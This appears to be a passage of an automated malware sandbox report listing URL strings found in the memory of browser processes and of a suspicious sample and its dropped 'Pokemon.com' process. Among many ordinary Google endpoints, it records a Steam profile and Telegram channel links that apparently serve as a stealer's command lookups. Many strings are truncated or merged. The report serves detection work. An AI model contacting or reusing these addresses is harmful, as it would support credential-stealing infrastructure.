                Source: chrome.exe, 00000010.00000002.2715928120.00007C1C012D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/njb
                Source: chrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706590684.00007C1C004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2708918579.00007C1C007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2709028513.00007C1C007D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706590684.00007C1C004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2708918579.00007C1C007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2709028513.00007C1C007D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706590684.00007C1C004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2708918579.00007C1C007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2709028513.00007C1C007D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
                Source: chrome.exe, 00000010.00000002.2715928120.00007C1C012D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2704552562.00007C1C0001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/
                Source: chrome.exe, 00000010.00000002.2716151641.00007C1C012F9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                Source: chrome.exe, 00000010.00000003.2625434291.00007C1C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713081034.00007C1C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2715561352.00007C1C01154000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2716151641.00007C1C012F9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                Source: chrome.exe, 00000010.00000002.2716151641.00007C1C012F9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                Source: chrome.exe, 00000010.00000002.2714839708.00007C1C00EC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2716151641.00007C1C012F9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_defaultidd_art_url
                Source: chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_defaultmetadataamees
                Source: chrome.exe, 00000010.00000002.2704552562.00007C1C0001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/ogl
                Source: chrome.exe, 00000010.00000002.2713588754.00007C1C00C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706664303.00007C1C00500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2708399052.00007C1C00724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000010.00000002.2705243132.00007C1C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/
                Source: chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                Source: chrome.exe, 00000010.00000003.2625434291.00007C1C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713081034.00007C1C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2715561352.00007C1C01154000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                Source: chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                Source: chrome.exe, 00000010.00000002.2713588754.00007C1C00C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_defaultbank_namename
                Source: chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_defaultexp_month
                Source: chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_defaultuse_date
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
                Source: msedge.exe, 00000014.00000002.2845861001.00005C8400398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                Source: chrome.exe, 00000010.00000003.2670389834.00007C1C02C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                Source: chrome.exe, 00000010.00000002.2715290296.00007C1C0101E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.goog
                Source: chrome.exe, 00000010.00000002.2707863936.00007C1C006CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                Source: chrome.exe, 00000010.00000003.2670389834.00007C1C02C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                Source: chrome.exe, 00000010.00000003.2670389834.00007C1C02C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                Source: chrome.exe, 00000010.00000002.2709791438.00007C1C008AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizatgoogs.cm/downlMIZATION
                Source: chrome.exe, 00000010.00000002.2714340908.00007C1C00DB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2627373601.00007C1C006C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714869667.00007C1C00EE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714616210.00007C1C00E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
                Source: chrome.exe, 00000010.00000002.2712637460.00007C1C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2627373601.00007C1C006C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714869667.00007C1C00EE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714951149.00007C1C00EF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712971216.00007C1C00BE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714616210.00007C1C00E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2705358211.00007C1C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
                Source: chrome.exe, 00000010.00000003.2627373601.00007C1C006C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714869667.00007C1C00EE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714616210.00007C1C00E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
                Source: chrome.exe, 00000010.00000002.2714616210.00007C1C00E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
                Source: chrome.exe, 00000010.00000003.2627373601.00007C1C006C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714869667.00007C1C00EE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714616210.00007C1C00E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
                Source: chrome.exe, 00000010.00000003.2627373601.00007C1C006C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714869667.00007C1C00EE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2705579902.00007C1C002D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714616210.00007C1C00E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
                Source: chrome.exe, 00000010.00000002.2714340908.00007C1C00DB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2627373601.00007C1C006C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714869667.00007C1C00EE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714616210.00007C1C00E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
                Source: chrome.exe, 00000010.00000002.2714697767.00007C1C00E78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2627373601.00007C1C006C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714869667.00007C1C00EE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714951149.00007C1C00EF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714616210.00007C1C00E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
                Source: chrome.exe, 00000010.00000002.2706590684.00007C1C004D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
                Source: msedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                Source: msedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                Source: msedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                Source: msedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                Source: msedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                Source: msedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                Source: msedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                Source: msedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                Source: msedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                Source: msedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                Source: msedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                Source: msedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                Source: msedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                Source: msedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                Source: chrome.exe, 00000010.00000002.2710713687.00007C1C00968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2710864567.00007C1C00987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
                Source: chrome.exe, 00000010.00000003.2632365817.00007C1C010D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632061196.00007C1C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632631737.00007C1C0120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                Source: chrome.exe, 00000010.00000002.2710713687.00007C1C00968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2710864567.00007C1C00987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                Source: chrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                Source: chrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                Source: chrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                Source: chrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 00000010.00000002.2704703981.00007C1C00078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
                Source: chrome.exe, 00000010.00000002.2704839811.00007C1C000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
                Source: JA7cOAGHym.exeString found in binary or memory: https://sectigo.com/CPS0
                Source: chrome.exe, 00000010.00000002.2705243132.00007C1C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
                Source: chrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                Source: chrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                Source: chrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706590684.00007C1C004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2708918579.00007C1C007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2709028513.00007C1C007D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706590684.00007C1C004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2708918579.00007C1C007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
                Source: chrome.exe, 00000010.00000002.2709028513.00007C1C007D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactionsA
                Source: chrome.exe, 00000010.00000002.2708399052.00007C1C00724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: chrome.exe, 00000010.00000002.2706334888.00007C1C00428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2669760383.00007C1C02C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2670976589.00007C1C02C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                Source: Pokemon.com, 0000000C.00000002.3073394194.0000000000D63000.00000004.00000020.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3073991340.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439280630.0000000004234000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439391577.0000000000D95000.00000004.00000020.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439197434.0000000003F39000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439480420.0000000003FB4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439435287.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439221836.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3076149953.0000000004231000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                Source: Pokemon.com, 0000000C.00000002.3076149953.0000000004231000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                Source: Pokemon.com, 0000000C.00000002.3080713787.0000000006B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Pokemon.com, 0000000C.00000002.3080713787.0000000006B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Pokemon.com, 0000000C.00000003.2439032795.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439197434.0000000003F39000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439337123.0000000003FB4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439113890.0000000003FB4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439095251.0000000003FE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.m
                Source: Pokemon.com, 0000000C.00000002.3073297473.0000000000D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                Source: Pokemon.com, 0000000C.00000003.2439032795.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439197434.0000000003F39000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439337123.0000000003FB4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439113890.0000000003FB4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439095251.0000000003FE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04
                Source: Pokemon.com, 0000000C.00000002.3074168906.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439280630.0000000004234000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439391577.0000000000D95000.00000004.00000020.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3076149953.000000000427D000.00000040.00001000.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439197434.0000000003F39000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439480420.0000000003FB4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439435287.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439221836.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3076149953.0000000004231000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael
                Source: Pokemon.com, 0000000C.00000002.3076149953.0000000004231000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                Source: chrome.exe, 00000010.00000002.2711269920.00007C1C009D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
                Source: chrome.exe, 00000010.00000002.2705243132.00007C1C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                Source: Pokemon.com, 0000000C.00000002.3074168906.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3076149953.000000000427D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: Pokemon.com, 0000000C.00000002.3074481165.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3074481165.0000000004193000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3073484431.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, AS26FU.12.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: Pokemon.com, 0000000C.00000002.3074481165.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3074481165.0000000004193000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3073484431.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, AS26FU.12.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: Pokemon.com, 0000000C.00000002.3074481165.0000000004210000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706524682.00007C1C004B0000.00000004.00000800.00020000.00000000.sdmp, WLFCTJ.12.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: chrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2625679705.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                Source: chrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2625679705.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
                Source: chrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2625679705.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
                Source: JA7cOAGHym.exe, Pokemon.com.2.dr, Cars.9.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: chrome.exe, 00000010.00000003.2649479606.00007C1C002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                Source: chrome.exe, 00000010.00000002.2708399052.00007C1C00724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: chrome.exe, 00000010.00000002.2708399052.00007C1C00724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: chrome.exe, 00000010.00000003.2637997719.00007C1C00D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707863936.00007C1C006CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
